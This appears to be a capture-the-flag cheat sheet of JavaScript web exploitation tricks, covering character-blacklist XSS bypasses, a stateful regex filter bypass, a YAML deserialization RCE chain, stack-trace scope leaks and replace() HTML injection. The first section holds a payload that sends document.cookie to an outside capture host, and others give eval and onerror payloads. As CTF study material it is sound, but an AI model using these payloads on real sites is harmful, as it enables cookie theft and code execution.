Javascript Forbidden Char Bypass

Attachments

References

https://itsbengsky.id/blog/ITSECCTF/#445-pts-damn-i-love-php

---

Bypass forbidden characters in Javascript when special characters are blacklisted.

Solver

Forbidden Characters:

$forbidden = ['\\','<','>','`','~','(',')',',','+','-','/','*','^','|','&','!','?',':',';','.'];

Bypass Method 1: Using instanceof and array syntax

3 instanceof [document['body']['innerHTML']=location['hash']][document['body']['innerHTML']=document['body']['innerText']]#<img/src="x"/onerror=fetch('https://waefawe.free.beeceptor.com/?c='+document.cookie)>

Bypass Method 2: Using Symbol.hasInstance

3[o={}] in [o[Symbol['hasInstance']] = eval]["PAYLOAD" instanceof o]

Flag

---

Regex with Option /g Bypass

Attachments

References

---

When a regex has the global flag set, test() will advance the lastIndex of the regex. Further calls to test(str) will resume searching str starting from lastIndex. The lastIndex property will continue to increase each time test() returns true.

Solver

Vulnerable Code:

const removePigeonsWithFlag = (pigeons) => {
    const flagRegex = /SEE{\w{60}}/ig
    let cleanPigeons = []
    for (const pigeon of pigeons) {
        if (
            !flagRegex.test(pigeon.name) &&
            !flagRegex.test(pigeon.image) &&
            !flagRegex.test(pigeon.description) &&
            !flagRegex.test(pigeon.website)
        )
            cleanPigeons.push(pigeon)
    }
    return cleanPigeons
}

Exploitation: The regex with /g flag maintains state between tests, allowing bypass by splitting the flag across multiple fields.

Flag

---

YAML Deserialization RCE

Attachments

References

---

Chaining YAML deserialization with JSON injection for RCE via malicious toString function.

Solver

You will need to use the json injection bug twice:

First injection: Create a malicious YAML with privilegeLevel being { toString: !!js/function "..." }. Since Node.js requires .yaml extension, set username to ???.yaml\x00 causing Nim to null truncate the saved filename to ???.yaml.

Second injection: Create a JSON with privilegeLevel being a path traversal payload to the YAML from above (../../../users/...). Once you login with the second user, code execution triggers when visiting /profile as EJS triggers toString.

Flag

---

Leaking Global (this) via Error

Attachments

References

---

Leak global scope by manipulating Error.prepareStackTrace to access stack frames.

Solver

Method 1:

try {
    null.f();
} catch (e) {
    TypeError = e.constructor;
}
Error = TypeError.prototype.__proto__.constructor;
Error.prepareStackTrace = (err, structuredStackTrace) => structuredStackTrace;
try {
    null.f();
} catch (e) {
    g = e.stack[0];
    console.log(g);
}

Method 2 (Throwing stack):

try {
    null.f()
} catch (e) {
    TypeError = e.constructor
}
Error = TypeError.prototype.__proto__.constructor;
Error.prepareStackTrace = (err, structuredStackTrace) => structuredStackTrace;
try{
    null.f();
} catch(e) {
    const g = e.stack;
    if (g) { throw { message: g } };
}

Flag

---

String.replace / replaceAll Bypass

Attachments

References

MDN String.replace

---

Exploit special character $ in replace() which allows referencing the replacer in the replacee.

Solver

The special character $ is used which allows to reference the replacer in the replacee. When the body is not closed, we can inject HTML.

Payload:

$' a='<a href="'><img src=a onerror=alert(2)>">asd</a>

Flag

---

Lack of Computed Key Validation

Attachments

References

https://gist.github.com/egonny/4dbf5151f99059ae58cf9390c7cc3830

---

Exploit lack of validation of "computed" key in MemberExpression checker which allows Math.E and Math[E] expressions.

Solver

Strings can also be created using global x variable which was created by <a id="x"> HTML code.

Flag